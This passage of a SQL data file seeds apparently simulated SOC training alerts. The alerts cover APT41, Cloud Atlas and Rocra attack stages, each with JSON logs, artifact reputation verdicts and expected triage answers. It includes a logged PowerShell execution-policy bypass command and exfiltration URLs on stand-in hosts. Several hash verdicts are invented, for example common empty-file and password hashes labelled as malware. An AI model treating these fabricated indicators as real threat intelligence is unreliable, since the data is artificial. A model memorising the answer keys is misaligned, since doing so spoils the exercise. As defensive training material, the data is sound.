(533, 'Lateral Movement: Expanding Network Footprint', 'high', 'User Behavior Analytics', 'Using stolen credentials, the attackers move laterally across the network to identify high-value targets. This step involves credential dumping to facilitate further infiltration into the network.', 'Credential Dumping', 'T1003', 1, 'new', 68, '{\"timestamp\":\"2023-10-15T14:48:00Z\",\"event_id\":\"4625\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.15.23\",\"username\":\"jdoe\",\"process_name\":\"lsass.exe\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"event_description\":\"Failed login attempt detected. Potential credential dumping via lsass.exe process.\",\"host\":\"WIN-SERVER01\",\"detected_by\":\"User Behavior Analytics\",\"file_path\":\"C:\\\\Windows\\\\System32\\\\lsass.exe\"}', '2026-01-06 02:36:36', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP Reputation Database\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with previous attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.15.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of targeted host.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User account used in unusual access pattern.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Hash Registry\",\"verdict\":\"malicious\",\"details\":\"Hash belongs to a known credential dumping tool.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(534, 'Exfiltration: Data Harvesting', 'high', 'Data Loss Prevention', 'APT41 begins exfiltrating data from compromised systems, focusing on valuable intellectual property and sensitive user data.', 'Data Exfiltration', 'T1020: Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:30Z\",\"event_source\":\"Data Loss Prevention\",\"src_ip\":\"10.20.30.40\",\"dst_ip\":\"203.0.113.45\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"file_name\":\"Sensitive_Project_Documents.zip\",\"user\":\"jdoe\",\"action\":\"file_transfer\",\"protocol\":\"HTTPS\",\"destination_url\":\"https://malicious-site.example.com/upload\",\"external_ip\":\"203.0.113.45\",\"internal_ip\":\"10.20.30.40\"}', '2026-01-06 02:36:36', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT41 infrastructure.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known APT41 exfiltration tool.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"https://malicious-site.example.com/upload\",\"is_critical\":true,\"osint_result\":{\"source\":\"Domain Reputation Service\",\"verdict\":\"malicious\",\"details\":\"URL used for data exfiltration by APT41.\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"10.20.30.40\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Internal IP of compromised host.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL),
(535, 'Target Identification: Specific MAC Addresses', 'high', 'Threat Intelligence Feeds', 'The attackers are utilizing malware to identify and target specific MAC addresses, indicating a precise strike within the broader attack. This operation highlights the advanced capabilities of APT41 in conducting targeted attacks.', 'Targeted Attack', 'T1087 - Account Discovery', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:45:32Z\",\"source_ip\":\"203.0.113.5\",\"destination_ip\":\"10.0.0.45\",\"malware_hash\":\"3f1d8e5c4a7e2eefb9f0a7f8d7c4d3c1\",\"malware_filename\":\"CCleaner_v5.33.exe\",\"target_mac\":\"00:1A:2B:3C:4D:5E\",\"user\":\"jdoe\",\"action\":\"Identify\",\"result\":\"Specific MAC address identified within infected network\",\"attack_type\":\"Supply Chain Attack\"}', '2026-01-06 02:36:36', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Shodan\",\"verdict\":\"malicious\",\"details\":\"IP associated with past APT41 activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host identified in attack\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f1d8e5c4a7e2eefb9f0a7f8d7c4d3c1\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Malware associated with CCleaner supply chain attack\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"CCleaner_v5.33.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known malicious file used in supply chain attack\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal HR Database\",\"verdict\":\"internal\",\"details\":\"Legitimate user account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(536, 'Command and Control: Maintaining Communication', 'high', 'Network Traffic Analysis', 'Network traffic analysis has identified persistent communication between internal hosts and known APT41 command and control servers. The backdoors on compromised systems maintain communication to ensure ongoing control. Indicators such as IPs, hashes, and domains have been flagged.', 'C2 Communication', 'T1105', 1, 'new', NULL, '{\"timestamp\":\"2023-10-14T03:21:45Z\",\"src_ip\":\"192.168.1.101\",\"dst_ip\":\"203.0.113.45\",\"dst_port\":443,\"protocol\":\"HTTPS\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"filename\":\"backdoor.exe\",\"hash\":\"b1946ac92492d2347c6235b4d2611184\",\"domain\":\"control.apt41-malicious.com\",\"username\":\"jdoe\",\"malware_family\":\"APT41_Backdoor\"}', '2026-01-06 02:36:36', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_asset_management\",\"verdict\":\"internal\",\"details\":\"Internal IP address of a compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence_feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with APT41.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Hash of the backdoor file used by APT41.\"}},{\"id\":\"artifact_4\",\"type\":\"domain\",\"value\":\"control.apt41-malicious.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence_feed\",\"verdict\":\"malicious\",\"details\":\"Malicious domain used for C2 communication by APT41.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"backdoor.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_reputation_service\",\"verdict\":\"malicious\",\"details\":\"Executable file associated with APT41 backdoor.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_user_directory\",\"verdict\":\"internal\",\"details\":\"Username of the compromised account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(537, 'Cleanup: Covering Tracks', 'high', 'File Integrity Monitoring', 'APT41 has been detected employing anti-forensic techniques to erase traces of their attack. This includes the deletion of log files and alteration of timestamps to cover their tracks, complicating detection and analysis efforts.', 'Anti-Forensic Techniques', 'T1070.004 - File Deletion', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T02:14:23Z\",\"event_type\":\"file_modification\",\"user\":\"malicious_actor\",\"affected_files\":[\"/var/log/auth.log\",\"/var/log/syslog\"],\"modification_type\":\"delete\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.10\",\"hashes\":[\"e99a18c428cb38d5f260853678922e03\",\"d41d8cd98f00b204e9800998ecf8427e\"],\"associated_username\":\"admin_user\"}', '2026-01-06 02:36:36', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with APT41 activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP involved in the incident.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with APT41 known malware.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Integrity Monitoring\",\"verdict\":\"clean\",\"details\":\"Empty file hash indicating possible log file deletion.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"suspicious\",\"details\":\"Unusual activity detected from admin account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(538, 'Suspicious Cloud Service Access', 'medium', 'Firewall logs', 'A compromised email account was used to send phishing emails containing links to payloads hosted on OneDrive. This appears to be an attempt to gain initial access to the network.', 'Initial Access', 'T1566.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-02T10:15:30Z\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.10\",\"src_port\":443,\"dst_port\":58642,\"protocol\":\"HTTPS\",\"action\":\"allowed\",\"username\":\"compromised_user@domain.com\",\"url\":\"https://onedrive.live.com/download?cid=1234abcd&resid=1234abcd%2D5678%2D90ef%2D1234%2D567890abcdef\",\"filename\":\"Invoice_Details.docx\",\"file_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"email_subject\":\"Urgent: Invoice Details Required\"}', '2026-01-07 22:29:04', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"IP associated with known phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"https://onedrive.live.com/download?cid=1234abcd&resid=1234abcd%2D5678%2D90ef%2D1234%2D567890abcdef\",\"is_critical\":true,\"osint_result\":{\"source\":\"URL Analysis\",\"verdict\":\"suspicious\",\"details\":\"URL used in phishing email to deliver malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Invoice_Details.docx\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename commonly used in phishing campaigns.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hash Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malware delivery.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"compromised_user@domain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"User Account Monitoring\",\"verdict\":\"suspicious\",\"details\":\"Account activity consistent with compromise.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'NULL', 1, 0, NULL),
(539, 'Cloud Atlas Malware Execution', 'high', 'Endpoint detection and response (EDR) logs', 'Upon successful initial access, the Cloud Atlas malware is executed on the target systems, utilizing PowerShell scripts to maintain stealth and execute remote commands.', 'Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"user\":\"jdoe\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell -ExecutionPolicy Bypass -File C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\deployUpdate.ps1\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"file_name\":\"deployUpdate.ps1\",\"event_description\":\"PowerShell script executed for potential remote command execution\",\"os_version\":\"Windows 10 Pro\",\"device_name\":\"DESKTOP-AB123CD\"}', '2026-01-07 22:29:04', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Inventory\",\"verdict\":\"internal\",\"details\":\"Internal IP address of a company asset\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known malware hash associated with Cloud Atlas\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"deployUpdate.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal File Inventory\",\"verdict\":\"suspicious\",\"details\":\"Suspicious file not commonly used in environment\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal HR Database\",\"verdict\":\"clean\",\"details\":\"Active employee with system access\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(540, 'Encrypted Data Exfiltration via Cloud Storage', 'high', 'Network traffic analysis', 'Network traffic analysis has identified suspicious encrypted data transfers from an internal system to a cloud storage service. The data is believed to be encrypted diplomatic communications exfiltrated to a Google Drive account, potentially for malicious purposes.', 'Exfiltration', 'T1567.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"src_ip\":\"192.168.1.45\",\"dst_ip\":\"35.190.247.1\",\"src_port\":443,\"dst_port\":443,\"protocol\":\"HTTPS\",\"user\":\"j.doe@diplomacy.gov\",\"filename\":\"encrypted_comm_20231015.bin\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"cloud_service\":\"Google Drive\",\"action\":\"upload\",\"bytes_sent\":1048576,\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36\"}', '2026-01-07 22:29:04', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal host suspected to be compromised.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"35.190.247.1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Google Cloud\",\"verdict\":\"suspicious\",\"details\":\"Google Drive IP used for potential data exfiltration.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with encrypted payload used in exfiltration.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"encrypted_comm_20231015.bin\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"File suspected to contain sensitive encrypted communications.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(541, 'Unauthorized Access Detected', 'high', 'Email Gateway Logs', 'Rocra initiates its attack by sending spear-phishing emails containing malicious attachments to gain initial foothold in the network.', 'Initial Access', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:23:45Z\",\"email_id\":\"c2c9d5a3-5b4f-4099-a6e5-124ae6d2b5f7\",\"from\":\"attacker@example.malicious\",\"to\":\"user@targetcompany.com\",\"subject\":\"Urgent: Update Your Account Information\",\"attachment\":\"Invoice_Update_2023.docx\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"malicious_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.45\",\"username\":\"jdoe\",\"malware_family\":\"Rocra\"}', '2026-01-07 22:29:58', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"attacker@example.malicious\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known phishing domain associated with Rocra.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Rocra malware.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP Reputation Service\",\"verdict\":\"malicious\",\"details\":\"IP address linked to Rocra command and control servers.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Invoice_Update_2023.docx\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename pattern commonly used in phishing campaigns.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(542, 'Execution of Malicious Payload', 'high', 'Endpoint Security Alerts', 'Once access is achieved, the Rocra malware executes its payload, allowing attackers to remotely control infected machines. This step indicates the execution phase of the attack with potential remote control capabilities.', 'Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:05Z\",\"event_id\":\"4625\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.15\",\"username\":\"john.doe\",\"process_name\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"malware_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"file_name\":\"Rocra_Payload.exe\",\"action\":\"Execution\",\"status\":\"Success\",\"severity\":\"High\"}', '2026-01-07 22:29:58', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Rocra APT group.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of affected host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Rocra malware payload.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Rocra_Payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Security\",\"verdict\":\"malicious\",\"details\":\"Filename detected during execution of Rocra malware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal HR\",\"verdict\":\"clean\",\"details\":\"Legitimate internal user.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(543, 'Establishing Backdoor for Persistence', 'high', 'Network Traffic Analysis', 'Rocra sets up a backdoor on the compromised systems, enabling persistent access even after reboots or network changes. Network traffic indicates communication with a known malicious IP and the transfer of a backdoor executable.', 'Persistence', 'T1059: Command and Scripting Interpreter', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"TCP\",\"destination_port\":80,\"event_type\":\"network\",\"file\":{\"name\":\"backdoor.exe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"user\":\"compromised_user\",\"action\":\"file_download\",\"status\":\"success\"}', '2026-01-07 22:29:58', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with Rocra APT.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Rocra backdoor executable.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"backdoor.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"File name associated with malicious activity.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"suspicious\",\"details\":\"User account exhibiting unusual behavior.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(544, 'Stealthy Lateral Movement', 'high', 'Active Directory Logs', 'Rocra uses stolen credentials to move laterally within the network, searching for sensitive diplomatic and research data.', 'Lateral Movement', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-11T14:23:45Z\",\"event_id\":\"4624\",\"logon_type\":3,\"target_username\":\"jdoe\",\"target_domain\":\"CORP\",\"source_ip\":\"192.168.1.101\",\"destination_ip\":\"10.10.3.15\",\"authentication_package\":\"Kerberos\",\"logon_process\":\"NtLmSsp\",\"subject_user_name\":\"admin_elevated\",\"subject_domain_name\":\"CORP\",\"subject_logon_id\":\"0x3E7\",\"hashes\":[\"f5d8ee39d9f9a6bfcf7e9e8ae281d756\"],\"event_description\":\"An account was successfully logged on.\"}', '2026-01-07 22:29:58', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network_scanning\",\"verdict\":\"internal\",\"details\":\"Internal IP used for lateral movement.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.10.3.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"network_logs\",\"verdict\":\"internal\",\"details\":\"Destination IP for the lateral movement.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"user_activity_monitoring\",\"verdict\":\"suspicious\",\"details\":\"Stolen credentials used for unauthorized access.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"f5d8ee39d9f9a6bfcf7e9e8ae281d756\",\"is_critical\":false,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"suspicious\",\"details\":\"Potentially associated with known APT activities.\"}}],\"recommended_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'NULL', 1, 0, NULL),
(545, 'Data Exfiltration Detected', 'high', 'Data Loss Prevention (DLP) Alerts', 'The final stage sees Rocra exfiltrating targeted data, including encrypted and previously deleted files, marking the success of their espionage mission.', 'Exfiltration', 'T1567 - Exfiltration Over Web Service', 1, 'new', NULL, '{\"timestamp\":\"2023-10-22T14:32:00Z\",\"event\":\"data_exfiltration\",\"source_ip\":\"10.0.0.15\",\"destination_ip\":\"203.0.113.45\",\"user\":\"jdoe\",\"filename\":\"encrypted_project_files.zip\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"exfil_method\":\"HTTP POST\",\"destination_url\":\"http://malicious-domain.com/upload\",\"associated_user\":\"jdoe@company.com\",\"alert_id\":\"DLP-2023-5678\",\"indicator_of_compromise\":[\"IP:203.0.113.45\",\"HASH:b1946ac92492d2347c6235b4d2611184\",\"URL:http://malicious-domain.com/upload\"]}', '2026-01-07 22:29:58', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash matches known malware samples.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-domain.com/upload\",\"is_critical\":true,\"osint_result\":{\"source\":\"OpenPhish\",\"verdict\":\"malicious\",\"details\":\"URL used for data exfiltration in previous incidents.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
